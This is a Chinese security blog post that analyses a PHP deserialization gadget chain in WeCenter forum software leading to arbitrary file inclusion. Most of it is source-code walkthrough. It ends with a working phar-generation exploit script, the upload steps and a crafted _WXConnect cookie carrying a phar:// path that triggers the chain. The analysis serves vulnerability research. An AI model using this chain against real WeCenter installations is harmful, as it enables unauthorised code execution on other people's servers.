<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  
  <title>WECENTER 反序列任意文件包含利用链 | 雨了个雨&#39;s blog</title>

  
  <meta name="author" content="雨了个雨">
  

  
  <meta name="description" content="Focus On Web Security">
  

  
  
  <meta name="keywords" content="Web">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="WECENTER 反序列任意文件包含利用链"/>

  <meta property="og:site_name" content="雨了个雨&#39;s blog"/>

  
  <meta property="og:image" content="/favicon.ico"/>
  

  <link href="/favicon.ico" rel="icon">
  <link rel="alternate" href="/atom.xml" title="雨了个雨&#39;s blog" type="application/atom+xml">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
<div class="blog">
  <div class="content">

    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/">雨了个雨&#39;s blog</a>
    </h1>
    <p class="site-description"></p>
  </div>
  <nav class="site-navigation">
    <ul>
      
        <li><a href="/">Home</a></li>
      
        <li><a href="/archives">Archives</a></li>
      
        <li><a href="/friends">Friends</a></li>
      
    </ul>
  </nav>
</header>

    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>WECENTER 反序列任意文件包含利用链</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/2020/01/22/WECENTER-反序列任意文件包含利用链/" rel="bookmark">
        <time class="entry-date published" datetime="2020-01-22T07:21:31.000Z">
          2020-01-22
        </time>
      </a>
    </span>
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        <p>看了下最近的WeCenter的反序列，原文最后是通过反序列执行任意SQL语句进入后台实现GETSHELL。自己想另外找一个前台就能GETSHELL的利用链，就去看了下代码。</p>
<h2 id="POP"><a href="#POP" class="headerlink" title="POP"></a>POP</h2><p>system/Savant3.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Savant3</span> </span>&#123;</span><br><span class="line">    .......</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">$this</span>-&gt;getOutput();</span><br><span class="line">	&#125;</span><br><span class="line">	.......</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在toString魔术方法中调用了getOutput方法，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getOutput</span>(<span class="params">$tpl = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $output = <span class="keyword">$this</span>-&gt;fetch($tpl);</span><br><span class="line">       <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;isError($output)) &#123;</span><br><span class="line">           $text = <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;error_text&#x27;</span>];</span><br><span class="line">           <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;escape($text);</span><br><span class="line">       &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">           <span class="keyword">return</span> $output;</span><br><span class="line">       &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>接着调用fetch方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">fetch</span>(<span class="params">$tpl = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="comment">// make sure we have a template source to work with</span></span><br><span class="line">		<span class="keyword">if</span> (is_null($tpl)) &#123;</span><br><span class="line">			$tpl = <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;template&#x27;</span>];</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="comment">// get a path to the compiled template script</span></span><br><span class="line">		$result = <span class="keyword">$this</span>-&gt;template($tpl);</span><br><span class="line"></span><br><span class="line">		<span class="comment">// did we get a path?</span></span><br><span class="line">		<span class="keyword">if</span> (! $result || <span class="keyword">$this</span>-&gt;isError($result)) &#123;</span><br><span class="line">		</span><br><span class="line">			<span class="comment">// no. return the error result.</span></span><br><span class="line">			<span class="keyword">return</span> $result;</span><br><span class="line">			</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		</span><br><span class="line">			<span class="comment">// yes.  execute the template script.  move the script-path</span></span><br><span class="line">			<span class="comment">// out of the local scope, then clean up the local scope to</span></span><br><span class="line">			<span class="comment">// avoid variable name conflicts.</span></span><br><span class="line">			<span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;fetch&#x27;</span>] = $result;</span><br><span class="line">			<span class="keyword">unset</span>($result);</span><br><span class="line">			<span class="keyword">unset</span>($tpl);</span><br><span class="line">			</span><br><span class="line">			<span class="comment">// are we doing extraction?</span></span><br><span class="line">			<span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;extract&#x27;</span>]) &#123;</span><br><span class="line">				<span class="comment">// pull variables into the local scope.</span></span><br><span class="line">				extract(get_object_vars(<span class="keyword">$this</span>), EXTR_REFS);</span><br><span class="line">			&#125;</span><br><span class="line">			</span><br><span class="line">			<span class="comment">// buffer output so we can return it instead of displaying.</span></span><br><span class="line">			ob_start();</span><br><span class="line">			</span><br><span class="line">			<span class="comment">// are we using filters?</span></span><br><span class="line">			<span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;filters&#x27;</span>]) &#123;</span><br><span class="line">				<span class="comment">// use a second buffer to apply filters. we used to set</span></span><br><span class="line">				<span class="comment">// the ob_start() filter callback, but that would</span></span><br><span class="line">				<span class="comment">// silence errors in the filters. Hendy Irawan provided</span></span><br><span class="line">				<span class="comment">// the next three lines as a &quot;verbose&quot; fix.</span></span><br><span class="line">				ob_start();</span><br><span class="line">				<span class="keyword">include</span> <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;fetch&#x27;</span>];</span><br><span class="line">				<span class="keyword">echo</span> <span class="keyword">$this</span>-&gt;applyFilters(ob_get_clean());</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="comment">// no filters being used.</span></span><br><span class="line">				<span class="keyword">include</span> <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;fetch&#x27;</span>];</span><br><span class="line">			&#125;</span><br><span class="line">			</span><br><span class="line">			<span class="comment">// reset the fetch script value, get the buffer, and return.</span></span><br><span class="line">			<span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;fetch&#x27;</span>] = <span class="literal">null</span>;</span><br><span class="line">			<span class="keyword">return</span> ob_get_clean();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>在getOutput调用fetch方法时，传入的参数为null。所以这时候可以通过控制__config[‘template’]成员变量进而控制tpl模板路径。接着会调用template方法获取模板文件绝对路径，如果文件存在就会包含该文件。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">template</span>(<span class="params">$tpl = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="comment">// set to default template if none specified.</span></span><br><span class="line">	<span class="keyword">if</span> (is_null($tpl)) &#123;</span><br><span class="line">		$tpl = <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;template&#x27;</span>];</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// find the template source.</span></span><br><span class="line">	$file = <span class="keyword">$this</span>-&gt;findFile(<span class="string">&#x27;template&#x27;</span>, $tpl);</span><br><span class="line">	<span class="keyword">if</span> (! $file) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">$this</span>-&gt;error(</span><br><span class="line">			<span class="string">&#x27;ERR_TEMPLATE&#x27;</span>,</span><br><span class="line">			<span class="keyword">array</span>(<span class="string">&#x27;template&#x27;</span> =&gt; $tpl)</span><br><span class="line">		);</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>在template方法中，通过findFile方法获取模板文件的绝对路径，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">findFile</span>(<span class="params">$type, $file</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="comment">// get the set of paths</span></span><br><span class="line">	$set = <span class="keyword">$this</span>-&gt;__config[$type . <span class="string">&#x27;_path&#x27;</span>];</span><br><span class="line"></span><br><span class="line">	<span class="comment">// start looping through the path set</span></span><br><span class="line">	<span class="keyword">foreach</span> ($set <span class="keyword">as</span> $path) &#123;</span><br><span class="line">		</span><br><span class="line">		<span class="comment">// get the path to the file</span></span><br><span class="line">		$fullname = $path . $file;</span><br><span class="line"></span><br><span class="line">		<span class="comment">// is the path based on a stream?</span></span><br><span class="line">		<span class="keyword">if</span> (strpos($path, <span class="string">&#x27;://&#x27;</span>) === <span class="literal">false</span>) &#123;</span><br><span class="line">			<span class="comment">// not a stream, so do a realpath() to avoid</span></span><br><span class="line">			<span class="comment">// directory traversal attempts on the local file</span></span><br><span class="line">			<span class="comment">// system. Suggested by Ian Eure, initially</span></span><br><span class="line">			<span class="comment">// rejected, but then adopted when the secure</span></span><br><span class="line">			<span class="comment">// compiler was added.</span></span><br><span class="line">			$path = realpath($path); <span class="comment">// needed for substr() later</span></span><br><span class="line"></span><br><span class="line">			$fullname = realpath($fullname);</span><br><span class="line"></span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">		<span class="comment">// the substr() check added by Ian Eure to make sure</span></span><br><span class="line">		<span class="comment">// that the realpath() results in a directory registered</span></span><br><span class="line">		<span class="comment">// with Savant so that non-registered directores are not</span></span><br><span class="line">		<span class="comment">// accessible via directory traversal attempts.</span></span><br><span class="line">		<span class="keyword">if</span> (file_exists($fullname) &amp;&amp; is_readable($fullname) &amp;&amp;</span><br><span class="line">			substr($fullname, <span class="number">0</span>, strlen($path)) == $path) &#123;</span><br><span class="line">			<span class="keyword">return</span> $fullname;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="comment">// could not find the file in the set of paths</span></span><br><span class="line">	<span class="keyword">return</span> <span class="literal">false</span>;</span><br></pre></td></tr></table></figure>

<p>可见模板的目录来自__config[$type . ‘_path’]成员变量，模板文件名来自tpl变量，都可以通过反序列控制这些变量。如果文件存在就会直接返回该文件路径然后包含该文件，所以在反序列时，可以实现任意文件包含。</p>
<p>接着需要找一个能触发Savant3类__toString方法的链。<br>在system/Zend/Mail/Protocol/Imap.php中，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Zend_Mail_Protocol_Imap</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    ........</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;logout();</span><br><span class="line">    &#125;</span><br><span class="line">    ........</span><br><span class="line">&#125;    </span><br></pre></td></tr></table></figure>
<p>跟入logout方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">logout</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $result = <span class="literal">false</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;_socket) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            $result = <span class="keyword">$this</span>-&gt;requestAndResponse(<span class="string">&#x27;LOGOUT&#x27;</span>, <span class="keyword">array</span>(), <span class="literal">true</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Zend_Mail_Protocol_Exception $e) &#123;</span><br><span class="line">            <span class="comment">// ignoring exception</span></span><br><span class="line">        &#125;</span><br><span class="line">        fclose(<span class="keyword">$this</span>-&gt;_socket);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;_socket = <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在设置了_socket成员变量的情况下会接着调用requestAndResponse方法，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">requestAndResponse</span>(<span class="params">$command, $tokens = <span class="keyword">array</span>(<span class="params"></span>), $dontParse = <span class="literal">false</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;sendRequest($command, $tokens, $tag);</span><br><span class="line">    $response = <span class="keyword">$this</span>-&gt;readResponse($tag, $dontParse);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $response;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">sendRequest</span>(<span class="params">$command, $tokens = <span class="keyword">array</span>(<span class="params"></span>), &amp;$tag = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (!$tag) &#123;</span><br><span class="line">        ++<span class="keyword">$this</span>-&gt;_tagCount;</span><br><span class="line">        $tag = <span class="string">&#x27;TAG&#x27;</span> . <span class="keyword">$this</span>-&gt;_tagCount;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $line = $tag . <span class="string">&#x27; &#x27;</span> . $command;</span><br></pre></td></tr></table></figure>

<p>在sendRequest方法中，++操作符对对象类型无影响，_tagCount属性和’TAG’字符串进行了拼接，将_tagCount属性设置为Savant3的实例对象就能触发Savant3的toString魔术方法进而实现利用。</p>
<p>反序列触发点就不再写了，直接看之前的文章即可。</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>/?/publish/<br>注册完账号后，在发起问答里上传被包含的图片 </p>
<p><img src="https://yulegeyublog.oss-cn-beijing.aliyuncs.com/we_1.jpg" alt="-w1393"></p>
<p>uploads/question/20200122/81f8ed3cbc7fe76fc7b18e28108316b9.jpg</p>
<p>然后生成Phar, 访问plugins/wc_editor/editor.php文件可获取到绝对路径，也可以使用相对路径。<br><img src="https://yulegeyublog.oss-cn-beijing.aliyuncs.com/we_2.jpg" alt="-w932"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Savant3</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> $__config = <span class="keyword">array</span>();</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;template&#x27;</span>] = <span class="string">&#x27;81f8ed3cbc7fe76fc7b18e28108316b9.jpg&#x27;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;__config[<span class="string">&#x27;template_path&#x27;</span>] = <span class="keyword">array</span>(<span class="string">&quot;/Applications/MAMP/htdocs/test/wecenter/uploads/question/20200122/&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Zend_Mail_Protocol_Imap</span></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> $_socket;</span><br><span class="line">    <span class="keyword">protected</span> $_tagCount;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;_socket = <span class="string">&#x27;a&#x27;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;_tagCount = <span class="keyword">new</span> Savant3();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$obj = <span class="keyword">new</span> Zend_Mail_Protocol_Imap();</span><br><span class="line"></span><br><span class="line">$filename = <span class="string">&quot;exp.phar&quot;</span>;</span><br><span class="line">$phar=<span class="keyword">new</span> Phar($filename);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setMetadata($obj);</span><br><span class="line">$phar-&gt;addFromString(<span class="string">&quot;a&quot;</span>,<span class="string">&quot;b&quot;</span>);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>生成后接着上传phar文件。<br><img src="https://yulegeyublog.oss-cn-beijing.aliyuncs.com/we_3.jpg" alt="-w1427"></p>
<p>得到phar文件地址，<br>uploads/question/20200122/126d8d61e2d864a875dc714380b833a6.jpg</p>
<p>接着访问/?/m/weixin/binding/ 绑定微信，将phar文件地址替换到以下cookie里 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cookie前缀_WXConnect&#x3D;&#123;&quot;access_token&quot;:&#123;&quot;openid&quot;:&quot;aa&quot;&#125;,&quot;access_user&quot;:&#123;&quot;nickname&quot;:&quot;aaa&quot;,&quot;headimgurl&quot;:&quot;phar:&#x2F;&#x2F;.&#x2F;uploads&#x2F;question&#x2F;20200122&#x2F;126d8d61e2d864a875dc714380b833a6.jpg&quot;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://yulegeyublog.oss-cn-beijing.aliyuncs.com/we_4.jpg" alt="-w1068"></p>
<p>最后访问/?/account/ajax/synch_img/ 即可触发反序列。</p>
<p><img src="https://yulegeyublog.oss-cn-beijing.aliyuncs.com/we_5.jpg" alt="-w518"></p>
<h2 id="References"><a href="#References" class="headerlink" title="References"></a>References</h2><p>1.<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7077">https://xz.aliyun.com/t/7077</a></p>

      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/tags/Web/">Web</a>
    </span>
    

    </div>

    
  </div>
</article>

  






    </main>

    <footer class="site-footer">
  <p class="site-info">
    Proudly powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and
    Theme by <a href="https://github.com/CodeDaraW/Hacker" target="_blank">Hacker</a>
    </br>
    
    &copy; 2022 雨了个雨
    
  </p>
</footer>
    
    
  </div>
</div>
</body>
</html>